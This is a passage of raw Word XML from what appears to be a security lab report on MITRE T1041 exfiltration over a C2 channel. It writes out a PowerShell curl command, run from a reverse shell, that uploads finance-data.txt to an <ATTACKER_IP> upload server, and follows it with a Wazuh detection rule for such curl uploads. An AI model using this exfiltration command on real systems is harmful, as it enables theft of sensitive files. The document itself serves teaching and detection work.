      <w:bookmarkEnd w:id="54"/>
      <w:commentRangeEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="55"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39170A61" w14:textId="4F2B41DA" w:rsidR="00883337" w:rsidRDefault="2BFA4357" w:rsidP="004A5111">
      <w:r>
        <w:t>Exfiltration over C2 Channel, command-and-control, is when the attacker exfiltrates sensitive files from the victim machine to the attacker controlled C2 server. In this case, the C2 server used is a python upload server running on port 8000. The attacker's goal is to exfiltrate and send the finance-data.txt out of the victim's machine. This takes place after privilege escalation to ensure the attacker has access to the sensitive files to be exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA77E47" w14:textId="2C433E3E" w:rsidR="004A5111" w:rsidRDefault="004A5111" w:rsidP="004A5111"/>
    <w:p w14:paraId="45AD076C" w14:textId="7D8C817E" w:rsidR="00CC68CF" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a python upload server. This is the C2 channel used to receive the data, finance-data.txt. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB3439" w14:paraId="332FB6EB" w14:textId="77777777" w:rsidTr="00AB3439">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AF612D" w14:textId="19E5E311" w:rsidR="00AB3439" w:rsidRDefault="00531C63" w:rsidP="00AB3439">
            <w:r>
              <w:t>python -m uploadserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B282287" w14:textId="6B67474E" w:rsidR="003271B5" w:rsidRDefault="00DE16FB" w:rsidP="00905C00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57203161" wp14:editId="48705329">
            <wp:extent cx="3517900" cy="539597"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2139888703" name="Picture 1" descr="A close up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88703" name="Picture 1" descr="A close up of a computer screen  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3517900" cy="539597"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65A814" w14:textId="5BED04E1" w:rsidR="00AB3439" w:rsidRDefault="00AB3439" w:rsidP="00905C00"/>
    <w:p w14:paraId="107D1E0A" w14:textId="4CCCC015" w:rsidR="00AB3439" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the reverse shell created in privilege escalation stage, enter the following to use curl to send the file contents over to the C2 channel. The file will be found in the directory where the C2 channel is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>started on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w14:paraId="750FA731" w14:textId="77777777" w:rsidTr="16D5F394">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696C268C" w14:textId="1475AC30" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00531C63">
            <w:r>
              <w:t>$output = (C:\Windows\System32\curl.exe -F "files=@C:\icrm\finance-data.txt" http://&lt;ATTACKER_IP&gt;:8000/upload 2&gt;&amp;1 | Out-String); Write-Host $output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54BF31AC" w14:textId="7CC0DE71" w:rsidR="00905C00" w:rsidRDefault="003271B5" w:rsidP="00905C00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1FE498" wp14:editId="4F533834">
            <wp:extent cx="5836920" cy="189230"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="61070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36920" cy="18923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591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w14:paraId="175941F1" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02A84F85" w14:textId="77777777" w:rsidR="00531C63" w:rsidRPr="00140470" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>$output = (…)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DFF547F" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t xml:space="preserve">This assigns whatever is inside the brackets to the variable $output. This means that the output made from the command will be stored as a string in $output. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w14:paraId="73B3D462" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56436EB3" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>C:\Windows\System32\curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FAB30C" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>The tool used to send HTTP requests to the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w14:paraId="3680034C" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E7ABB6" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>-F “files=@C:\icrm\finance-data.txt”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B3458D" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t xml:space="preserve">This </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>specify</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the file, “</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r>
              <w:t>C:\icrm\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>finance</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>data.txt</w:t>
            </w:r>
            <w:r>
              <w:t>”, to attach and send.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w14:paraId="1F695031" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="680B429D" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>http://&lt;ATTACKER_IP&gt;:8000/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1307703B" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t xml:space="preserve">The destination server and path </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>is</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> set to &lt;ATTACKER_IP&gt;, which is the attacker controlled upload server, C2 channel. The 8000 is the port the server is listening </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>on</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>. /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>upload</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is to specify to send to the upload server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w14:paraId="4BF563BC" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26362997" w14:textId="77777777" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00732B3A">
            <w:r>
              <w:t>2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E64BC4" w14:textId="67D4EBC2" w:rsidR="00531C63" w:rsidRDefault="005F6B8B" w:rsidP="00732B3A">
            <w:r>
              <w:t>Normal ouput and errors will be combined to ensure that the $output variable will not have errors in it. This is done by redirecting errors to normal output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C15E83" w14:paraId="0F0944DE" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="200012B8" w14:textId="07C2A33A" w:rsidR="00C15E83" w:rsidRDefault="00C15E83" w:rsidP="00C15E83">
            <w:r>
              <w:t>| Out-String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DDAD424" w14:textId="13DFA8C1" w:rsidR="00C15E83" w:rsidRDefault="005F6B8B" w:rsidP="00C15E83">
            <w:r>
              <w:t xml:space="preserve">This converts the output lines into a string to </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>allow the output to be printed properly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C15E83" w14:paraId="08200DF1" w14:textId="77777777" w:rsidTr="00732B3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3011970E" w14:textId="77777777" w:rsidR="00C15E83" w:rsidRDefault="00C15E83" w:rsidP="00C15E83">
            <w:r>
              <w:t>Write-Host $output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDCBBDE" w14:textId="468C22FB" w:rsidR="00C15E83" w:rsidRDefault="005F6B8B" w:rsidP="00C15E83">
            <w:r>
              <w:t>This prints out the output at the end.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6222CB36" w14:textId="2C4E7FDE" w:rsidR="00C05F84" w:rsidRDefault="00C05F84" w:rsidP="00905C00"/>
    <w:p w14:paraId="43D5353E" w14:textId="152001F6" w:rsidR="00AB3439" w:rsidRDefault="2BFA4357" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To verify that the exfiltration is successful, use cat to view the contents of the file exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w14:paraId="6B6FC844" w14:textId="77777777" w:rsidTr="00531C63">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1922E9CB" w14:textId="213A9B36" w:rsidR="00531C63" w:rsidRDefault="00531C63" w:rsidP="00531C63">
            <w:r>
              <w:t>cat finance-data.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EB43141" w14:textId="45CA411C" w:rsidR="00AB3439" w:rsidRDefault="003F02C2" w:rsidP="00905C00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12390A3E" wp14:editId="562DE0F4">
            <wp:extent cx="1816100" cy="503052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="424206439" name="Picture 1" descr="A close up of a sig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06439" name="Picture 1" descr="A close up of a sign  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1937101" cy="536569"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2594D4BE" w14:textId="09CE5F62" w:rsidR="00AB3439" w:rsidRDefault="00AB3439" w:rsidP="00905C00"/>
    <w:p w14:paraId="1F740C46" w14:textId="16B34603" w:rsidR="00AB3439" w:rsidRDefault="624D80FE" w:rsidP="00E41785">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The python upload server listner shows the file, finance-data.txt, being uploaded successfully and stored in the /root directory as finance-data.txt. “POST /upload HTTP/1.1” shows that the victim machine is sending the data to the /upload endpoint of the attacker server using HTTP POST. POST is used to send the data as the content is a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FFEAE9" w14:textId="4962B5DA" w:rsidR="2BFA4357" w:rsidRDefault="2BFA4357" w:rsidP="624D80FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5315AF00" wp14:editId="0955FE99">
            <wp:extent cx="5829300" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47397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7450" name="Picture 47397450"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C485DE4" w14:textId="2CDF4530" w:rsidR="00B8236E" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc220896708"/>
      <w:commentRangeStart w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:commentRangeEnd w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="57"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B2EAC" w14:textId="7B26D058" w:rsidR="001548A6" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There is both network and host-based detection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F470077" w14:textId="7F2F86CC" w:rsidR="00B8236E" w:rsidRDefault="2BFA4357" w:rsidP="2BFA4357">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network-based detection focuses on the outbound traffic from the victim machine. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Wazuh rule is used to detect suspicious curl attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B27128" w14:textId="44243396" w:rsidR="546AAA22" w:rsidRDefault="546AAA22" w:rsidP="546AAA22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BAFB8E6" wp14:editId="2C12E3B6">
            <wp:extent cx="5829300" cy="352425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2133626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26723" name="Picture 2133626723"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="352425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241A5521" wp14:editId="31FF142F">
            <wp:extent cx="5829300" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1712688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88240" name="Picture 1712688240"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5504FEAD" wp14:editId="544C8EE8">
            <wp:extent cx="5829300" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="228156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6827" name="Picture 228156827"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1581150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9295" w:type="dxa"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6835"/>
        <w:gridCol w:w="2460"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B1604B" w:rsidRPr="00924A31" w14:paraId="042BC73A" w14:textId="77777777" w:rsidTr="099E7C3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7135" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2953B644" w14:textId="208FF19B" w:rsidR="00AD34ED" w:rsidRDefault="43CEF484" w:rsidP="43CEF484">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&lt;group name="exfiltration,curl,mitre_T1041"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7527F84A" w14:textId="266C3A0F" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;rule id="300004" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="201A55CA" w14:textId="07AC60BC" w:rsidR="00AD34ED" w:rsidRDefault="43CEF484" w:rsidP="43CEF484">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    &lt;if_sid&gt;61603&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00226673" w14:textId="7C5C82E4" w:rsidR="00AD34ED" w:rsidRDefault="43CEF484" w:rsidP="43CEF484">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;field name="win.eventdata.image" type="pcre2"&gt;(?i).*curl\.exe$&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5157EB91" w14:textId="56CD450C" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;field name="win.eventdata.commandLine" type="pcre2"&gt;(?i)(-F|--form|-d|--data|--upload-file).*(http:\/\/|https:\/\/)&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8CE86E" w14:textId="0662341A" w:rsidR="00AD34ED" w:rsidRDefault="099E7C3F" w:rsidP="099E7C3F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;description&gt;MITRE ATT&amp;CK T1041: Exfiltration via Exfiltration Over C2 Channel&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AFFC184" w14:textId="2EDB1D7F" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E87D43" w14:textId="2197B026" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">      &lt;id&gt;T1041&lt;/id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546D3D2A" w14:textId="334E7395" w:rsidR="00AD34ED" w:rsidRDefault="0CC9AE5F" w:rsidP="0CC9AE5F">
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
